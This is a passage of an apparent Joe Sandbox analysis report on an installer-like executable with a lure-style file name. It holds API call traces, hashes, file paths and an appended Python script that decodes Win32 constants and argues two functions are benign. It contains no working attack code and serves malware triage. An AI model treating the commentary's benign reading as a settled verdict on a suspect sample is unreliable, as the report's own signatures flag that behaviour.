• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: PrivateProfileString
• String ID:
• API String ID: 1096422788-0
• Opcode ID: e0b3dadd6d67162a4040f0b18513ff5aedf9ef11460ada2f52f1fca357091c3d
• Instruction ID: bdd16972d33a24d8f715dd244a4521dc24e47ebf505f01b716e53bc3963aa27b
• Opcode Fuzzy Hash: e0b3dadd6d67162a4040f0b18513ff5aedf9ef11460ada2f52f1fca357091c3d
• Instruction Fuzzy Hash: 03E08671A44205BADB406FA08D09EBD3668BF01710F10013AF9507B0D5EBB88442B71D
                                                                                                              APIs
                                                                                                              • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA6,?), ref: 004031DC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 973152223-0
                                                                                                              APIs
                                                                                                              • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 3472027048-0
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNELBASE(00000040,10001251,?,?,100014DE,?,10001020,10001019,?), ref: 1000121D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1834372877.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1834339228.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                                              • Associated: 00000000.00000002.1834405696.0000000010003000.00000002.00000001.01000000.00000007.sdmp
                                                                                                              • Associated: 00000000.00000002.1834432896.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocGlobal
                                                                                                              • String ID:
                                                                                                              • API String ID: 3761449716-0
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404960
                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 0040496B
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 004049B5
                                                                                                              • LoadBitmapA.USER32(0000006E), ref: 004049C8
                                                                                                              • SetWindowLongA.USER32(?,000000FC,00404F3F), ref: 004049E1
                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049F5
                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A07
                                                                                                              • SendMessageA.USER32(?,00001109,00000002), ref: 00404A1D
                                                                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A29
                                                                                                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A3B
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404A3E
                                                                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A69
                                                                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A75
                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B0A
                                                                                                              • SendMessageA.USER32(?,0000110A,?,00000000), ref: 00404B35
                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B49
                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00404B78
                                                                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B86
                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404B97
                                                                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C94
                                                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CF9
                                                                                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D0E
                                                                                                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D32
                                                                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D52
                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404D67
                                                                                                              • GlobalFree.KERNEL32(?), ref: 00404D77
                                                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DF0
                                                                                                              • SendMessageA.USER32(?,00001102,?,?), ref: 00404E99
                                                                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EA8
                                                                                                              • InvalidateRect.USER32(?,00000000,?), ref: 00404EC8
                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404F16
                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404F21
                                                                                                              • ShowWindow.USER32(00000000), ref: 00404F28
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                              • String ID: $M$N
                                                                                                              • API String ID: 1638840714-813528018
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 00405169
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405178
                                                                                                              • GetClientRect.USER32(?,?), ref: 004051B5
                                                                                                              • GetSystemMetrics.USER32(00000015), ref: 004051BD
                                                                                                              • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051DE
                                                                                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004051EF
                                                                                                              • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405202
                                                                                                              • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405210
                                                                                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405223
                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405245
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405259
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040527A
                                                                                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040528A
                                                                                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052A3
                                                                                                              • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004052AF
                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405187
                                                                                                                • Part of subcall function 00404003: SendMessageA.USER32(00000028,?,?,00403E34), ref: 00404011
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004052CB
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000509D,00000000), ref: 004052D9
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004052E0
                                                                                                              • ShowWindow.USER32(00000000), ref: 00405303
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040530A
                                                                                                              • ShowWindow.USER32(00000008), ref: 00405350
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405384
• CreatePopupMenu.USER32 ref: 00405395
• AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004053AA
• GetWindowRect.USER32(?,000000FF), ref: 004053CA
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053E3
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040541F
• OpenClipboard.USER32(00000000), ref: 0040542F
• EmptyClipboard.USER32 ref: 00405435
• GlobalAlloc.KERNEL32(00000042,?), ref: 0040543E
• GlobalLock.KERNEL32(00000000), ref: 00405448
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040545C
• GlobalUnlock.KERNEL32(00000000), ref: 00405475
• SetClipboardData.USER32(?,00000000), ref: 00405480
• CloseClipboard.USER32 ref: 00405486
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID:
• API String ID: 590372296-0
• Opcode ID: 231f48aea31901215ad5789a1abc6fe8876b192cf8bd0b4f923181e6492b2055
• Instruction ID: 6e0b0f1ca08e2e29469adbd3a377171c3ef53385c96749dd380b411ab2712325
• Opcode Fuzzy Hash: 231f48aea31901215ad5789a1abc6fe8876b192cf8bd0b4f923181e6492b2055
• Instruction Fuzzy Hash: CBA16971900209BFDB21AFA0DD89AAE7F79FB04345F00407AFA05B61A0C7B55E41DF69
APIs
• GetDlgItem.USER32(?,000003FB), ref: 0040445B
• SetWindowTextA.USER32(00000000,?), ref: 00404485
• SHBrowseForFolderA.SHELL32(?,0041F0B8,?), ref: 00404536
• CoTaskMemFree.OLE32(00000000), ref: 00404541
• lstrcmpiA.KERNEL32(Call,0041FCE0), ref: 00404573
• lstrcatA.KERNEL32(?,Call), ref: 0040457F
• SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404591
  • Part of subcall function 004054D8: GetDlgItemTextA.USER32(?,?,00000400,004045C8), ref: 004054EB
  • Part of subcall function 00405F4B: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031F1,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00405FA3
  • Part of subcall function 00405F4B: CharNextA.USER32(?,?,?,00000000), ref: 00405FB0
  • Part of subcall function 00405F4B: CharNextA.USER32(?,"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031F1,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00405FB5
  • Part of subcall function 00405F4B: CharPrevA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031F1,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00405FC5
• GetDiskFreeSpaceA.KERNEL32(0041ECB0,?,?,0000040F,?,0041ECB0,0041ECB0,?,00000000,0041ECB0,?,?,000003FB,?), ref: 0040464C
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404667
• SetDlgItemTextA.USER32(00000000,00000400,0041ECA0), ref: 004046ED
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
• String ID: A$C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry$Call
• API String ID: 2246997448-359601769
• Opcode ID: f9db517728459d62a9e5b220071132723c113a2d480dcc074d32842f0db3b1f1
• Instruction ID: 313b0aeaa0dd49dd5f389a011650d1956071e47b5f1a5152bec8bcd399de40b9
• Opcode Fuzzy Hash: f9db517728459d62a9e5b220071132723c113a2d480dcc074d32842f0db3b1f1
• Instruction Fuzzy Hash: 049193B1900209ABDB10AFA1CD45BAF77B8EF85305F10847BFA01B72C1D77C9A418B69
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B37
• ShowWindow.USER32(?), ref: 00403B54
• DestroyWindow.USER32 ref: 00403B68
• SetWindowLongA.USER32(?,00000000,00000000), ref: 00403B84
• GetDlgItem.USER32(?,?), ref: 00403BA5
• SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BB9
• IsWindowEnabled.USER32(00000000), ref: 00403BC0
• GetDlgItem.USER32(?,?), ref: 00403C6E
• GetDlgItem.USER32(?,00000002), ref: 00403C78
• SetClassLongA.USER32(?,000000F2,?), ref: 00403C92
• SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403CE3
• GetDlgItem.USER32(?,?), ref: 00403D89
• ShowWindow.USER32(00000000,?), ref: 00403DAA
• EnableWindow.USER32(?,?), ref: 00403DBC
• EnableWindow.USER32(?,?), ref: 00403DD7
• GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403DED
• EnableMenuItem.USER32(00000000), ref: 00403DF4
• SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403E0C
• SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E1F
• lstrlenA.KERNEL32(0041FCE0,?,0041FCE0,Centraleuropisk Setup), ref: 00403E48
• SetWindowTextA.USER32(?,0041FCE0), ref: 00403E57
• ShowWindow.USER32(?,0000000A), ref: 00403F8B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
• String ID: Centraleuropisk Setup
• API String ID: 184305955-4217614216
• Opcode ID: ba0bfc16478daa2257c26ccfe252ff3d546126a5ed30cf874ebc8b0736617fa5
• Instruction ID: 21636550a0957eda034e59b3f0d86482ba9c2b0b2001697664a7690c7cb4d951
• Opcode Fuzzy Hash: ba0bfc16478daa2257c26ccfe252ff3d546126a5ed30cf874ebc8b0736617fa5
• Instruction Fuzzy Hash: D4C19171A08205BBDB216F61ED49E2B3E7DFB4470AB40443EF601B12E1C7799942EB5E
APIs
• CheckDlgButton.USER32(00000000,-0000040A,?), ref: 004041A2
• GetDlgItem.USER32(00000000,000003E8), ref: 004041B6
• SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 004041D4
• GetSysColor.USER32(?), ref: 004041E5
• SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041F4
• SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404203
• lstrlenA.KERNEL32(?), ref: 00404206
• SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404215
• SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040422A
• GetDlgItem.USER32(?,0000040A), ref: 0040428C
• SendMessageA.USER32(00000000), ref: 0040428F
• GetDlgItem.USER32(?,000003E8), ref: 004042BA
• SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042FA
• LoadCursorA.USER32(00000000,00007F02), ref: 00404309
• SetCursor.USER32(00000000), ref: 00404312
• ShellExecuteA.SHELL32(0000070B,open,00422680,00000000,00000000,?), ref: 00404325
• LoadCursorA.USER32(00000000,00007F00), ref: 00404332
• SetCursor.USER32(00000000), ref: 00404335
• SendMessageA.USER32(00000111,?,00000000), ref: 00404361
• SendMessageA.USER32(00000010,00000000,00000000), ref: 00404375
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
• String ID: Call$N$open$@@
• API String ID: 3615053054-3329210235
• Opcode ID: c0c4f3dfa7930a2e3ae4d180d0b9a457fe4ff7b578c86a244f8fb8896db8b50c
• Instruction ID: 48be33ef10acdba92a50f670ec3bcd7ef70e1bb9311df19d6f40dceb05da6325
• Opcode Fuzzy Hash: c0c4f3dfa7930a2e3ae4d180d0b9a457fe4ff7b578c86a244f8fb8896db8b50c
• Instruction Fuzzy Hash: 306183B1A40205BFEB109F61CC45F6A7B69EB84715F10803AFF05BA2D1C7B8A951CF99
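Two of the listings above are the ones behind the report's clipboard and shell-execution signatures, and both read differently once the bare hex is decoded. The function at 00405384..00405486 builds a context menu (TrackPopupMenu with 0x180 = TPM_NONOTIFY|TPM_RETURNCMD), pulls item text out of a list-view with 0x102D = LVM_GETITEMTEXTA into a 0x42 = GMEM_MOVEABLE|GMEM_ZEROINIT block and hands it to SetClipboardData; it never calls GetClipboardData, so it writes the clipboard without reading it, the shape of a "copy details" handler rather than clipboard harvesting. The function at 004041A2..00404375 enables 0x45B = EM_AUTOURLDETECT on a rich-edit control, fetches the clicked range with 0x44B = EM_GETTEXTRANGE and passes it to ShellExecuteA with the verb "open" between an IDC_WAIT (0x7F02) and an IDC_ARROW (0x7F00) cursor, i.e. it opens whatever link the control's text contains. The script below is an added example, not part of the report or of Joe Security's tooling: it parses records in this listing format and decodes the constants. The record strings are copied from the two listings (the second one as an excerpt), the constant names are the documented Win32 values from winuser.h, commctrl.h and richedit.h, and the idiom heuristics in find_idioms are my own reading of the call order.

```python
"""Parse Joe Sandbox per-function 'APIs' listings and decode the Win32
constants the sandbox prints as bare hex (added example, not report code)."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed input 1: the clipboard function, copied from the report listing.
RECORD_CLIPBOARD = """\
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405384
• CreatePopupMenu.USER32 ref: 00405395
• AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004053AA
• GetWindowRect.USER32(?,000000FF), ref: 004053CA
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053E3
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040541F
• OpenClipboard.USER32(00000000), ref: 0040542F
• EmptyClipboard.USER32 ref: 00405435
• GlobalAlloc.KERNEL32(00000042,?), ref: 0040543E
• GlobalLock.KERNEL32(00000000), ref: 00405448
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040545C
• GlobalUnlock.KERNEL32(00000000), ref: 00405475
• SetClipboardData.USER32(?,00000000), ref: 00405480
• CloseClipboard.USER32 ref: 00405486
"""
# Constructed input 2: excerpt of the function at 004041A2..00404375.
RECORD_LICENSE = """\
• SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 004041D4
• SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404203
• SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042FA
• LoadCursorA.USER32(00000000,00007F02), ref: 00404309
• SetCursor.USER32(00000000), ref: 00404312
• ShellExecuteA.SHELL32(0000070B,open,00422680,00000000,00000000,?), ref: 00404325
"""

@dataclass
class ApiCall:
    api: str                          # e.g. "SendMessageA"
    module: str                       # e.g. "USER32"
    args: list                        # raw tokens as printed; "?" = not recovered
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # set for "Part of subcall function X:" lines

CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")

def parse_record(text: str) -> list:
    """One ApiCall per '• Api.MODULE(args), ref: addr' line; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if m:
            sub, api, mod, args, ref = m.groups()
            calls.append(ApiCall(api, mod, args.split(",") if args else [],
                                 int(ref, 16), int(sub, 16) if sub else None))
    return calls

def as_const(tok: str) -> Optional[int]:
    """An 8-digit hex argument as an int; '?' or symbolic arguments give None."""
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok.strip()) else None

# Only the constants that occur in the listings above (documented Win32 values).
WINDOW_MESSAGES = {
    0x00F3: "BM_SETSTATE", 0x00F4: "BM_SETSTYLE",
    0x0435: "EM_EXLIMITTEXT", 0x0443: "EM_SETBKGNDCOLOR", 0x0445: "EM_SETEVENTMASK",
    0x0449: "EM_STREAMIN", 0x044B: "EM_GETTEXTRANGE", 0x045B: "EM_AUTOURLDETECT",
    0x1004: "LVM_GETITEMCOUNT", 0x102D: "LVM_GETITEMTEXTA",
}
GMEM_FLAGS = {0x0002: "GMEM_MOVEABLE", 0x0040: "GMEM_ZEROINIT"}
TPM_FLAGS = {0x0080: "TPM_NONOTIFY", 0x0100: "TPM_RETURNCMD"}
CURSOR_IDS = {0x7F00: "IDC_ARROW", 0x7F02: "IDC_WAIT"}

def decode_flags(value: Optional[int], table: dict) -> Optional[str]:
    """Bit-set value as 'A|B'; undecoded leftover bits are kept as hex."""
    if value is None:
        return None
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) if names else hex(value)

def decode_call(c: ApiCall) -> Optional[str]:
    """Symbolic name of the call's key constant, or None when unknown/unrecovered."""
    if c.api.startswith("SendMessage") and len(c.args) == 4:  # hwnd, msg, wParam, lParam
        return WINDOW_MESSAGES.get(as_const(c.args[1]))
    if c.api == "GlobalAlloc" and c.args:
        return decode_flags(as_const(c.args[0]), GMEM_FLAGS)
    if c.api == "TrackPopupMenu" and len(c.args) > 1:
        return decode_flags(as_const(c.args[1]), TPM_FLAGS)
    if c.api.startswith("LoadCursor") and len(c.args) > 1:
        return CURSOR_IDS.get(as_const(c.args[1]))
    return None

def find_idioms(calls: list) -> list:
    """Heuristic reading (mine, not the sandbox's) of what the call order implements."""
    names = [c.api for c in calls]
    out = []
    if "OpenClipboard" in names and "SetClipboardData" in names:
        reads = "GetClipboardData" in names  # the only call here that reads the clipboard
        src = set()
        if "GlobalLock" in names and "GlobalUnlock" in names:  # what fills the buffer
            lo, hi = names.index("GlobalLock"), names.index("GlobalUnlock")
            src = {decode_call(c) for c in calls[lo + 1:hi]} - {None}
        out.append("clipboard write%s; buffer filled from %s" % (
            " (also reads it)" if reads else ", no GetClipboardData",
            ",".join(sorted(src)) or "unknown"))
    for i, c in enumerate(calls):
        if c.api.startswith("ShellExecute") and len(c.args) > 1 and c.args[1] == "open":
            before = {decode_call(p) for p in calls[:i]} - {None}
            src = "EM_GETTEXTRANGE" if "EM_GETTEXTRANGE" in before else "unknown source"
            out.append(f"ShellExecute 'open' at {c.ref:08X} on text from {src}")
    return out

if __name__ == "__main__":
    for rec in (RECORD_CLIPBOARD, RECORD_LICENSE):
        calls = parse_record(rec)
        for c in calls:
            print(f"{c.ref:08X} {c.api:<18} {decode_call(c) or ''}")
        print("  =>", "; ".join(find_idioms(calls)))
```

The parser deliberately keeps "?" and symbolic arguments as strings instead of dropping them, because the sandbox's argument recovery is positional: a SendMessage line with fewer than four recovered arguments cannot be decoded safely, so decode_call returns None for it rather than guessing which slot holds the message id. To triage a different record, paste its "APIs" lines into a string and extend the constant tables with the values that appear there.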
APIs
• DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
